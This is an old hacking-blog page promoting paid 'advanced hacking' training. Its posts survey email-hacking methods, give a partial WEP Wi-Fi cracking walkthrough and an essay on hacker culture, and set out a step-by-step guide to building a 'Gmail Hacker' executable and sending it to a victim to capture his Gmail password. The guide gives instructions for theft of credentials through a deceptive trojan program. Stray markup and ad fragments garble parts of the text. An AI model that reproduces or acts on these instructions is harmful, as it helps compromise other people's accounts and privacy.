Oct 29, 2013

HackersOnlineClub (HOC) is going to conduct 2-day training programs in INDIA.

  








Leave Massage on Facebook.com/dipeshdhn.
[TRAINING DETAILS]
---------------------------------------------------------------------------
Join Now don't miss!! by Dipesh
imageanchor="1" style="margin-left: 1em; margin-right: 1em;">

 Learn Advance Hacking with BackTrack (Full Tutorial)

[#] On 16th & 17th Nov 2013 (8hrs a day) In Pune


[#] Training Fee: $100 or 3000 INR 
Now Contact @facebook.com/dipeshdhn
 Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...
Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur Mail ID's..

Email Hacking can be possible to many ways like:-
 
1. Social Engineering

2.Phishing Attacks

3. Cookie Hijacking

4. By Keyloggers



Social Engineering:
This Process is defined as Hack the human mind without any tools...
This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple Psychological tricks that help to get the information we want.
This really works!! But it requires a lot of patience.
We are all talking about network security and fixing the vulnerabilities in networks.
 But what happens if some internal person of a network accidentally gives out the passwords. After all
we are all humans; we are also vulnerable and can be easily
 exploited and compromised than the computers.

Social Engineering attacks have become most common during the chat sessions.
With the increase in use of Instant Messengers, any anonymous person may have a
chat with another any where in the world. The most crucial part of this attack is to
win the trust of the victim.


Phishing Attack:
The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

Cookie Hijacking:
In cookie hijacking we can hack email accounts very easily.. This trick is very
 dangereous because whenever user change a password then there is no need to
 attacker for again hack Email- ID of victim.
And it would take you to inbox of victim's yahoo account without asking for any password of victim account.

Keyloggers:
Keylogger is a software program or hardware device that is used to monitor and log
each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because
these programs and hardware devices monitor the keys typed in a user can easily
find user passwords and other information a user may not wish others to know about.

Keyloggers, as a surveillance tool, are often used by employers to ensure employees
 use work computers for business purposes only. Unfortunately, keyloggers can also
 be embedded in spyware allowing your information to be transmitte

Jun 20, 2013

Hack W-iFi Password for beginners easy

Note: This post demonstrates how to crack WEP passwords, an older and less often used network security protocol. If the network you want to crack is using the more popular WPA encryption, see our guide to cracking a Wi-Fi network's WPA password with Reaver instead.

Copyright by Dip 

A compatible wireless adapter


This is the biggest requirement.: You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter, 
To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.



 Now Contact @ facebook.com/dipeshdhn

Jul 25, 2012

Online Ethical hacking

Dipesh Hacking Network


Welcome to register screen and learn Ethical Hacking

My dear friends. We provide Online ethical hacking classes by me. so if u want to join  me then please contact @ dipeshhacking.blogspot.com and send me your E-mail Id, with comments

you don't miss it, and share it, first come first serve.
Thanks
dipesh kumar

Sep 23, 2010

Dipesh Hacking Network  Acer Aspire AS5251-1805 15.6-Inch Laptop (Black)
Computer hacking (and hacking in general) is an often misunderstood part of today's society. As the media and various computer security outfits like to focus on what hackers have the potential to do, instead of what they actually do. In general, a hacker is seen as a social outcast that turns to the computer to gain a sense of power by generally destroying and stealing the possessions of other people. While that is true of some hackers, it is only one part of the entire picture. What we are dealing with here is an entire coculture, having roots as far back as 1960, when the term "hacker" was first applied to MIT students. Many hackers adhere to a mostly unwritten code of ethics, which sometimes would lead both outsiders and new hackers into believing that they don't exist at all. Surprisingly it is these same people that are most visible. People just beginning their exploration onto the Internet will most likely come into contact with the "rogue hacker" or a hacker that doesn't follow the hacker code of ethics. These rogue hackers portray a bad image of the hacker community in general, and often seem immature by using the so called "elite speek (l33t3, h4ck3r l4m3r)." This category was started with the hope to better educate non-hackers and hackers alike about what it truly means to be a hacker, the various types of hackers, and various aspects of the hacker community. It also has the purpose of teaching hackers about the non-hacker society, as hackers also carry misconceptions about the "real world."

Aug 28, 2010

Light lenseImage by _Hadock_ via Flickr
Dipesh Hacking Network50 FT FOOT CAT5E CAT 5 ETHERNET NETWORK PATCH LAN CABLE

1. First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework

2. Click HERE to download Gmail Hacker.

[ad code=1 align=center]

3. Download Winrar (free download here) to extract Gmail hacker folder.

4. Now, run Gmail Hacker Builder.exe file on your computer to see :



how to hack

5. Enter in your email address and password (** I RECOMMEND CREATING A FAKE ID AND ENTER THE DETAILS OF THAT FAKE ID ONLY** So that people should not have a fear of losing their real email IDs in a doubt about this application :) ) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.

6. Now, send this Gmail Hacker.exe file to victim and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he wanna hack).


how to hack

7. As he enters the information and hits “Hack Them”, he will receive an error message as shown below:

how to hack

7. In return, you will receive an email in your email account like this:

how to hack

9. You’re Done!! :D You got his Gmail ID n password!

Aug 23, 2010

HackersOnlineClub (HOC) is going to conduct 2-day training programs in INDIA.

    Leave Massage on Facebook.com/dipeshdhn. [TRAINING DETAILS] ------------------------------------------------------------...